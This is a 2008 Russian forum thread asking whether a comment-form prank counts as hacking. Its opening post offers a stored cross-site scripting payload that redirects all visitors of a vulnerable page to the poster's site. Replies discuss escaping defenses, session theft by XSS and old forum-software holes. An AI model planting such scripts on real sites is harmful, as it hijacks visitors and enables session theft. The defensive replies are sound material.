Вернуться   Дизайнерский форум » ВЕБ-ПРОГРАММИРОВАНИЕ » HTML, CSS, JavaScript

Это хакерство?

Обсуждение темы Это хакерство? в разделе HTML, CSS, JavaScript, часть категории ВЕБ-ПРОГРАММИРОВАНИЕ; гггг,есть 1 прикол.Работает он конечно-же не везде,н оесть сайты,где ето проходит.Надо чтобь было что-то типа "прокоментировать фотку",или "написать отзыв" ... А там пишем ...


Закрытая тема
 
Опции темы
Старый 05.05.2008, 20:34   #1
гггг,есть 1 прикол.Работает он конечно-же не везде,н оесть сайты,где ето проходит.Надо чтобь было что-то типа "прокоментировать фотку",или "написать отзыв" ... А там пишем что небудь типа по теме,а потом вставляэм ето:

<script language='javascript'>
var1=71;
var2=var1;
if(var1==var2) document.location="ввв.адрес.вашего .сайтаl";
</script>

И тогда на ту страницу больше никто не попадет,а все будут к вам ити)) Если админы плохие,то не скоро поймут что к чему.как вам ето?
 
Старый 05.05.2008, 20:34
Ссылки
Старый 05.05.2008, 21:00   #2
vov4yk, Угу ... только 80% сайтов в наше время имеют защиту. < на &lt; и т.д.
 
Старый 05.05.2008, 21:07   #3
Но есть еще 20%,на которых можно ето делать.Ето 2 сайта из 10.нормально

Цитата:
Сообщение от ivan341 Посмотреть сообщение
< на &lt; и т.д.
А как они ету защиту дедают?
 
Старый 05.05.2008, 21:34   #4
Dcc` сообщение переписывается в другую кодировку и эти символы браузем рассматриваются как символы.
 
Старый 06.05.2008, 00:12   #5
vov4yk, Самый простой способ str или preg.

Пример из мануала php

PHP код:

$search 
= array ("'<script[^>]*?>.*?</script>'si",  // Вырезает javaScript
                 
"'<[\/\!]*?[^<>]*?>'si",           // Вырезает HTML-теги
                 
"'([\r\n])[\s]+'",                 // Вырезает пробельные символы
                 
"'&(quot|#34);'i",                 // Заменяет HTML-сущности
                 
"'&(amp|#38);'i",
                 
"'&(lt|#60);'i",
                 
"'&(gt|#62);'i",
                 
"'&(nbsp|#160);'i",
                 
"'&(iexcl|#161);'i",
                 
"'&(cent|#162);'i",
                 
"'&(pound|#163);'i",
                 
"'&(copy|#169);'i",
                 
"'&#(\d+);'e");                    // интерпретировать как php-код

$replace = array ("",
                  
"",
                  
"\\1",
                  
"\"",
                  
"&",
                  
"<",
                  
">",
                  
" ",
                  
chr(161),
                  
chr(162),
                  
chr(163),
                  
chr(169),
                  
"chr(\\1)");

$text preg_replace($search$replace$document); 
 
Старый 06.05.2008, 01:47   #6
Самый простой способ -- это htmlspecialchars.
 
Старый 06.05.2008, 03:08   #7
Цитата:
Сообщение от vov4yk Посмотреть сообщение
гггг,есть 1 прикол.Работает он конечно-же не везде,н оесть сайты,где ето проходит.Надо чтобь было что-то типа "прокоментировать фотку",или "написать отзыв" ... А там пишем что небудь типа по теме,а потом вставляэм ето:

<script language='javascript'>
var1=71;
var2=var1;
if(var1==var2) document.location="ввв.адрес.вашего .сайтаl";
</script>

И тогда на ту страницу больше никто не попадет,а все будут к вам ити)) Если админы плохие,то не скоро поймут что к чему.как вам ето?
Люди часами бьются, что бы например найти уязвимость позволяющую вставить в текст форума html-код, ав в идеале javascript.
Раньше это можно было сделать использую спаренные bb-коды (а на не обновленных версиях phpBB и сейчас вполне можно), на предыдущих версиях IPB защита была, но можно было вставить javascript в жалобу (тогда этот скрипт выполнялся у модератора) да и спаренные BB-коды помнится прокатывали, ну и т.п.
Смысл в том, что яваскриптом можно украсть сессию админа и с этой сессией наделать делов. Но это все не хакерство... так - баловство

P.S. А еще я знаю (могу рассказать) как вообще ничего не взламывая дефейсить любой сайт с фреймами, но это больше для шуток над знакомыми веб-мастерами подходит
 
Старый 06.05.2008, 10:52   #8
Это вы этим удивить кого-то хотели? ))
Способов боловства для "хаккеров" кучи...
Если заинтересовались, качайте книги по безопасности, благо их навалом...

З.Ы. Только перед использование, Уголовный кодекс РФ (и не только) полезно бы прочесть;-)
 
Старый 06.05.2008, 12:31   #9
Это ламерство.
 
Старый 06.05.2008, 12:52   #10
я бы предложил в первом примере заменить ввв.адрес.вашего .сайтаl на ввв.порносайта или можно на ввв.кремля, ввв.белого.дома или чтото подобное. Так хоть весело людям будет...
 
Старый 06.05.2008, 12:52
Закрытая тема





Текущее время: 05:40. Часовой пояс GMT +4.

Реклама на форуме Условия размещения рекламы
Биржа ссылок Заработай на сайте!
Дизайнерский форум